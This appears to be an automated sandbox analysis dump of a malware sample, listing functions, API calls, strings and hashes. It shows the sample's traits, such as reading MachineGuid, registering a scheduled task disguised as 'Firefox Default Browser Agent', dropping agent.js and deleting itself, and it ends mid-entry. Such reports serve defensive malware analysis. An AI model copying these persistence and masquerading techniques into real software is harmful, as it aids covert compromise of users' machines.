                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: HeapQueryValue$AllocCloseOpenProcess
                • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                • API String ID: 2639912721-1211650757
                • Opcode ID: 6ae0b3a274ca32db051520b22b1535a7b7affc8d4766cb13542c0db01475670f
                • Instruction ID: 59da52f6a9cfb77242752fbefbb6cb86a78efc85eb15ed0f604b6421199b2e9b
                • Opcode Fuzzy Hash: 6ae0b3a274ca32db051520b22b1535a7b7affc8d4766cb13542c0db01475670f
                • Instruction Fuzzy Hash: A541BE31E0A315ABDB308BA9E884ABFB7B8AF48704F106459E881B7350E7719D85C7D0
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: task$char_traitsoperator!=
                • String ID: 1$H$P$jqzoubnuymkarflrgsblnyuijtzdyutycdfdhtloaqug
                • API String ID: 2802545854-3608006743
                • Opcode ID: c118306069d3f96578b03f9ce6f0cfb9139bd81ce7aca49746b90c8821937b55
                • Instruction ID: 764115aa25cb2d94577ce61333d371916b3f37a749b6bffaab61027a845ee304
                • Opcode Fuzzy Hash: c118306069d3f96578b03f9ce6f0cfb9139bd81ce7aca49746b90c8821937b55
                • Instruction Fuzzy Hash: 1E413770D08668DBCB14DFA4E995BEDBBB2FF11704F10412DE812AB280DB785A46CF54
                APIs
                • VariantInit.OLEAUT32(?), ref: 00E46B27
                • CoCreateInstance.OLE32(00E41020,00000000,00000001,00E41000,?), ref: 00E46B44
                • SysAllocString.OLEAUT32(\Mozilla), ref: 00E46B84
                • SysFreeString.OLEAUT32(?), ref: 00E46BBB
                • SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 00E46BC8
                • SysFreeString.OLEAUT32(00000000), ref: 00E46BDF
                Strings
                • Firefox Default Browser Agent 458046B0AF4A39CB, xrefs: 00E46BC3
                • \Mozilla, xrefs: 00E46B7F
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocFree$CreateInitInstanceVariant
                • String ID: Firefox Default Browser Agent 458046B0AF4A39CB$\Mozilla
                • API String ID: 478541636-252850850
                • Opcode ID: cda59eab985042d346a36865aa79213316dc377d2cc9dd3a8eea59633892ef64
                • Instruction ID: 9b641928a16aa97916417119bcec1eb33b9ec158c150483003d3eeea23bc660a
                • Opcode Fuzzy Hash: cda59eab985042d346a36865aa79213316dc377d2cc9dd3a8eea59633892ef64
                • Instruction Fuzzy Hash: 20317034F00248AFDB049B69DC89BAEBBB8EF4A345F005199E945F7251D630AD85CBA1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: char_traits
                • String ID: &$8$9$jgjqrkqomrozhbdhmdxtwulfach$uqip
                • API String ID: 1158913984-1523665428
                • Opcode ID: 0b92f9c707d754f4773c508162756ad4d98d40a16f1b60e1b81394d5f1bd94f0
                • Instruction ID: f59eda3c983dafea20d07f972c1f5eb976d2d1f0b8f81befd8feda137bedb4e9
                • Opcode Fuzzy Hash: 0b92f9c707d754f4773c508162756ad4d98d40a16f1b60e1b81394d5f1bd94f0
                • Instruction Fuzzy Hash: 27418C70D04A6ADACB14CFE6E5657EDBBB2FB04304F104119D0126B288DF795985CF41
                APIs
                Strings
                • jzdwqwyumqammpueooowjjgvtxkqyegzdhdgzslgyajsclbzvvlumjujvworvqtznfkokyknwpdvh, xrefs: 0062276C
                • wmralfjjyxjpaaahqtyukotytfokitzqpzktxxpjlasxwiqxteluyutwbngkpji, xrefs: 00622746, 00622781, 0062279E
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: task$char_traitsoperator!=
                • String ID: jzdwqwyumqammpueooowjjgvtxkqyegzdhdgzslgyajsclbzvvlumjujvworvqtznfkokyknwpdvh$wmralfjjyxjpaaahqtyukotytfokitzqpzktxxpjlasxwiqxteluyutwbngkpji
                • API String ID: 2802545854-3928441437
                • Opcode ID: aa0cfa3e707d03491be3fc85186bd123688a93676ac1ced218b9d22aef2ed382
                • Instruction ID: e46612cb7d5f828bd93ab12ae263a8ea4c1899038fc692f20dfe5d753c79abd6
                • Opcode Fuzzy Hash: aa0cfa3e707d03491be3fc85186bd123688a93676ac1ced218b9d22aef2ed382
                • Instruction Fuzzy Hash: 39419870D04AA8DADB10DFA4E925BEDBBB2AF15304F10825DD0017B285DBB85B09CFA1
                APIs
                Strings
                • cmmaewimvbelpxqmmrwavslbvxckdjjxygghbhnehbeilkkwojuodtbqctfcndflgicarztuniwfnttitcozeduy, xrefs: 006224A0
                • fwtzeppezjvazhyujtmjporsiuhoepcyezpzrndtdjonhkfwspgmjwijppeqbrmoricjjfsnrrohmmtnhquudfm, xrefs: 006224CF
                • dzydwibcsmroxflhizzvayjcy, xrefs: 00622482
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: task$char_traits
                • String ID: cmmaewimvbelpxqmmrwavslbvxckdjjxygghbhnehbeilkkwojuodtbqctfcndflgicarztuniwfnttitcozeduy$dzydwibcsmroxflhizzvayjcy$fwtzeppezjvazhyujtmjporsiuhoepcyezpzrndtdjonhkfwspgmjwijppeqbrmoricjjfsnrrohmmtnhquudfm
                • API String ID: 1455298312-3639978120
                • Opcode ID: e3c0df9a064a10922c75df3eae477df509fca300e331a15b8805f9bd28e844d9
                • Instruction ID: 2d0afe969b29e81556f7f17ee1ec616dedb314d71769ac66ffa258639cc41353
                • Opcode Fuzzy Hash: e3c0df9a064a10922c75df3eae477df509fca300e331a15b8805f9bd28e844d9
                • Instruction Fuzzy Hash: E7218C31D04BACDACB01DFA4D925BDDBB72BF15710F10425CE4116B291EB791B45CB90
                APIs
                • InternetCrackUrlW.WININET(00E4A104,00000000,00000000,0000003C), ref: 00E46585
                • GetProcessHeap.KERNEL32(00000008,00000001,00E4A104), ref: 00E465A7
                • HeapAlloc.KERNEL32(00000000), ref: 00E465AA
                • GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 00E46619
                • HeapAlloc.KERNEL32(00000000), ref: 00E4661C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocProcess$CrackInternet
                • String ID: <$xg
                • API String ID: 2637570027-1978849559
                • Opcode ID: 31be9fcda8edcb109495ee523bb6c2154d6a89b04004cb30c4626f4ab596b143
                • Instruction ID: cb6e0c7c6d22413f1b3ab96019a618b62d7409d98eee56937f6b4f6025dfbeb8
                • Opcode Fuzzy Hash: 31be9fcda8edcb109495ee523bb6c2154d6a89b04004cb30c4626f4ab596b143
                • Instruction Fuzzy Hash: 3C51D134A0130A8FDB24CF68E480BAEB7B4FF4A308F2554ADD459EB651DB71D9068752
                APIs
                • _ValidateLocalCookies.LIBCMT ref: 00624D87
                • ___except_validate_context_record.LIBVCRUNTIME ref: 00624D8F
                • _ValidateLocalCookies.LIBCMT ref: 00624E18
                • __IsNonwritableInCurrentImage.LIBCMT ref: 00624E43
                • _ValidateLocalCookies.LIBCMT ref: 00624E98
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                • String ID: csm
                • API String ID: 1170836740-1018135373
                • Opcode ID: 84d8cf827a9e0c63e30eaddee3d0b975ea83f3108a36db73d516c5537a649cf2
                • Instruction ID: 898d731d76f01d1ea1b57543ed795a20bacdf55c5e6f5d4c0d8d7307c1855f49
                • Opcode Fuzzy Hash: 84d8cf827a9e0c63e30eaddee3d0b975ea83f3108a36db73d516c5537a649cf2
                • Instruction Fuzzy Hash: 6841B134A006299BCF10DF68E880ADEBBB7BF45314F158459F9195B392DB31AD15CF90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID:
                • String ID: api-ms-$ext-ms-
                • API String ID: 0-537541572
                • Opcode ID: 874eb7dcccead4183f2db7830631b5b8de90eb6b15540e146d5b41bcd277a7e3
                • Instruction ID: 36680959b24030b264a31c8b1b6d9c55b4dff15e77e0abd75f9aff4a8a536785
                • Opcode Fuzzy Hash: 874eb7dcccead4183f2db7830631b5b8de90eb6b15540e146d5b41bcd277a7e3
                • Instruction Fuzzy Hash: 09212E31A04A31ABCB21ABA4BD49AAE37D79B01760F114211ED09AB3C1D7F0DC018DE3
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: task$char_traitsoperator!=
                • String ID: ianh$lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa$oyr
                • API String ID: 2802545854-2962047866
                • Opcode ID: fabc52054bc548789c3f11b14a65895c8a345043fd61ab39fcd6a53969e2d94e
                • Instruction ID: 8a7774d82113852a70a2889343689a1ca4cdf028d812b51cc71f77e015bdb9e8
                • Opcode Fuzzy Hash: fabc52054bc548789c3f11b14a65895c8a345043fd61ab39fcd6a53969e2d94e
                • Instruction Fuzzy Hash: 7E315870D04B68DAEB20DFA4D951BDEBBB2AF10704F10419DE10577282DBB91B89CFA1
                APIs
                  • Part of subcall function 00629D96: _free.LIBCMT ref: 00629DBB
                • _free.LIBCMT ref: 00629E1C
                  • Part of subcall function 00627FB2: HeapFree.KERNEL32(00000000,00000000,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?), ref: 00627FC8
                  • Part of subcall function 00627FB2: GetLastError.KERNEL32(?,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?,?), ref: 00627FDA
                • _free.LIBCMT ref: 00629E27
                • _free.LIBCMT ref: 00629E32
                • _free.LIBCMT ref: 00629E86
                • _free.LIBCMT ref: 00629E91
                • _free.LIBCMT ref: 00629E9C
                • _free.LIBCMT ref: 00629EA7
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: f8652940eed608665d87997f49d8a726addb3db1c042498b6f01942da26be76f
                • Instruction ID: 76130e69cbac0eee0b97aa0658ec8af5c3f90a205dc0ce95968a587850a7bd36
                • Opcode Fuzzy Hash: f8652940eed608665d87997f49d8a726addb3db1c042498b6f01942da26be76f
                • Instruction Fuzzy Hash: 10118131948F64AAE6B0BBB1EC07FCBB79F5F45700F808C1CB29966052DA35B5445F64
                APIs
                • ExpandEnvironmentStringsW.KERNEL32(%ProgramData%,?,00000104), ref: 00E4728A
                • PathCombineW.SHLWAPI(?,?,agent.js), ref: 00E472A3
                  • Part of subcall function 00E46B10: VariantInit.OLEAUT32(?), ref: 00E46B27
                  • Part of subcall function 00E46B10: CoCreateInstance.OLE32(00E41020,00000000,00000001,00E41000,?), ref: 00E46B44
                  • Part of subcall function 00E46B10: SysAllocString.OLEAUT32(\Mozilla), ref: 00E46B84
                  • Part of subcall function 00E46B10: SysFreeString.OLEAUT32(?), ref: 00E46BBB
                  • Part of subcall function 00E46B10: SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 00E46BC8
                  • Part of subcall function 00E46B10: SysFreeString.OLEAUT32(00000000), ref: 00E46BDF
                  • Part of subcall function 00E490C0: GetFileAttributesW.KERNEL32(?,00E472B9), ref: 00E490C1
                • DeleteFileW.KERNEL32(?), ref: 00E472C4
                • ExitProcess.KERNEL32 ref: 00E472CC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocFileFree$AttributesCombineCreateDeleteEnvironmentExitExpandInitInstancePathProcessStringsVariant
                • String ID: %ProgramData%$agent.js
                • API String ID: 1026123424-2175136953
                • Opcode ID: 0322f161376ba39a673ba3f66e0f9260dec3b5e9427168a4708a865fb934e658
                • Instruction ID: 9367560e730e90d83b323575d938a862fc33762e808274908c1fbcccc1c08772
                • Opcode Fuzzy Hash: 0322f161376ba39a673ba3f66e0f9260dec3b5e9427168a4708a865fb934e658
                • Instruction Fuzzy Hash: 6FF030B540031CAFCB20EBA0EC4DBDA737CAB05305F0005A0B755B21A1EBB09AC98F60
                APIs
                • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 0062C040
                • __fassign.LIBCMT ref: 0062C225
                • __fassign.LIBCMT ref: 0062C242
                • WriteFile.KERNEL32(?,0062AD05,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0062C28A
                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0062C2CA
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0062C372
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                • String ID:
                • API String ID: 1735259414-0
                • Opcode ID: 3b430d186f4921485f99ae55a1407b1df3d8342c0ff84db6dd04d88b08efb0d7
                • Instruction ID: 6f750621cccb08723db889072f126f033296ceeb0d5c7cd11e3c48de5d8b88f5
                • Opcode Fuzzy Hash: 3b430d186f4921485f99ae55a1407b1df3d8342c0ff84db6dd04d88b08efb0d7
                • Instruction Fuzzy Hash: 5CC18F75D046698FCB14CFE8D8809EDBBB6AF09314F28816AE855BB341D6319D46CFA0
                APIs
                • Sleep.KERNEL32(00000000), ref: 00E47E16
                • lstrcmpA.KERNEL32(00000000,INIT), ref: 00E47E23
                • StrToIntA.SHLWAPI(00000000), ref: 00E47EE6
                • GetTickCount64.KERNEL32 ref: 00E482EB
                  • Part of subcall function 00E45630: GetProcessHeap.KERNEL32(00000008,00000001,00E47EAE,00000001,00000000), ref: 00E45633
                  • Part of subcall function 00E45630: HeapAlloc.KERNEL32(00000000), ref: 00E4563A
                • StrToIntA.SHLWAPI(00000000), ref: 00E481E4
                • StrToIntA.SHLWAPI(?), ref: 00E481ED
                • CreateThread.KERNEL32(00000000,00000000,Function_000072E0,00000000,00000000,00000000), ref: 00E48201
                • CloseHandle.KERNEL32(00000000), ref: 00E4820C
                  • Part of subcall function 00E45650: GetProcessHeap.KERNEL32(00000000,00000000,00E48335), ref: 00E45657
                  • Part of subcall function 00E45650: HeapFree.KERNEL32(00000000), ref: 00E4565E
                • Sleep.KERNEL32(00000000), ref: 00E48346
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: Heap$ProcessSleep$AllocCloseCount64CreateFreeHandleThreadTicklstrcmp
                • String ID:
                • API String ID: 1253608127-0
                • Opcode ID: 9f2b674e59245cce3b5f20488bf6b24756fd55e235a5d0224bd4a788c6db9bd7
                • Instruction ID: a2a8890d3ef0f941f29f251ddc952c4dc3bd6af9b2d7c0effe1fb348fa5ef4e9
                • Opcode Fuzzy Hash: 9f2b674e59245cce3b5f20488bf6b24756fd55e235a5d0224bd4a788c6db9bd7
                • Instruction Fuzzy Hash: C8210531E406099BCB24AFB0FC42B6F73B8AF40700F512529E812B7292CF70DD088B99
                APIs
                • GetLastError.KERNEL32(?,?,0062509B,00624C89,006243FF), ref: 006250B2
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006250C0
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006250D9
                • SetLastError.KERNEL32(00000000,0062509B,00624C89,006243FF), ref: 0062512B
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: 6bbd2cb79dc8d061ba9d69f76334535508d309c56caad740ab51eedbb4406071
                • Instruction ID: e176753dca03c4f8f1f18c4f10a154f7724143f2f3db09ce046c427de3125914
                • Opcode Fuzzy Hash: 6bbd2cb79dc8d061ba9d69f76334535508d309c56caad740ab51eedbb4406071
                • Instruction Fuzzy Hash: 50014C32509F319EEB382774BD8AB962A57EB16374730022EF511862F0EFE54C155EC8
                APIs
                  • Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080
                • task.LIBCPMTD ref: 00621C63
                • task.LIBCPMTD ref: 00621C72
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: task$char_traits
                • String ID: O$ggieqzszmbzlvilbxhiegdimtjzyfwhho
                • API String ID: 1455298312-2259853572
                • Opcode ID: 57e8d045bf86a6b2d6f36258ef6ccb3c4286cff3e198c3ec41d730227fdcce91
                • Instruction ID: 34eecf5ffb2696d609c7d19da76262092bd5fcacd3d14aefcffba480a453c7b4
                • Opcode Fuzzy Hash: 57e8d045bf86a6b2d6f36258ef6ccb3c4286cff3e198c3ec41d730227fdcce91
                • Instruction Fuzzy Hash: AD416D74E08A28DBCB14CFA4E991BEDBBB2BB15304F10412DE412AB380DB785A45CF94
                APIs
                Strings
                • * , xrefs: 00622022
                • zrkzluimcyldjjcpuredwrursfudljqvoylitrgjifhjbxefdbyeqmrflbddqkjftjavheyivqdszqqujytotdawjlvaheatads, xrefs: 00622029
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: task$char_traits
                • String ID: * $zrkzluimcyldjjcpuredwrursfudljqvoylitrgjifhjbxefdbyeqmrflbddqkjftjavheyivqdszqqujytotdawjlvaheatads
                • API String ID: 1455298312-2972419988
                • Opcode ID: 85a6c171e3bc59cd609edfe9d0ac778f6f6bd06876f1f6296e6d1afc5f276f2b
                • Instruction ID: 1294a5c270d35c955bfc1e328e4bd5095cceba919d15cf62a2d8dde2601d25ba
                • Opcode Fuzzy Hash: 85a6c171e3bc59cd609edfe9d0ac778f6f6bd06876f1f6296e6d1afc5f276f2b
                • Instruction Fuzzy Hash: 6C115B71D00A58EACB04DFA4E955BDDF7B5EF08710F00826DE82167291EF391608CB94
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,006275D9,?,?,006275A1,?,?,?), ref: 0062763C
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0062764F
                • FreeLibrary.KERNEL32(00000000,?,?,006275D9,?,?,006275A1,?,?,?), ref: 00627672
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: e434c0119c7af523b5c7b69887fe933393589e4c3107d25d28e03bff8f8bdf07
                • Instruction ID: 7d81c06bee5a867cc3fd30172f946c10832e1a8dbd167d007cda3661cf34cfaa
                • Opcode Fuzzy Hash: e434c0119c7af523b5c7b69887fe933393589e4c3107d25d28e03bff8f8bdf07
                • Instruction Fuzzy Hash: 7FF08231901A19FBCB159B54DD0AFDD7A7AEF02796F000150E501AA2A0CB748E00DED0
                APIs
                • _free.LIBCMT ref: 00629D45
                  • Part of subcall function 00627FB2: HeapFree.KERNEL32(00000000,00000000,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?), ref: 00627FC8
                  • Part of subcall function 00627FB2: GetLastError.KERNEL32(?,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?,?), ref: 00627FDA
                • _free.LIBCMT ref: 00629D57
                • _free.LIBCMT ref: 00629D69
                • _free.LIBCMT ref: 00629D7B
                • _free.LIBCMT ref: 00629D8D
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 9982c3a0811fb38fc73ca69a093f2459b29f2df4d5118985393a5a04db7b7336
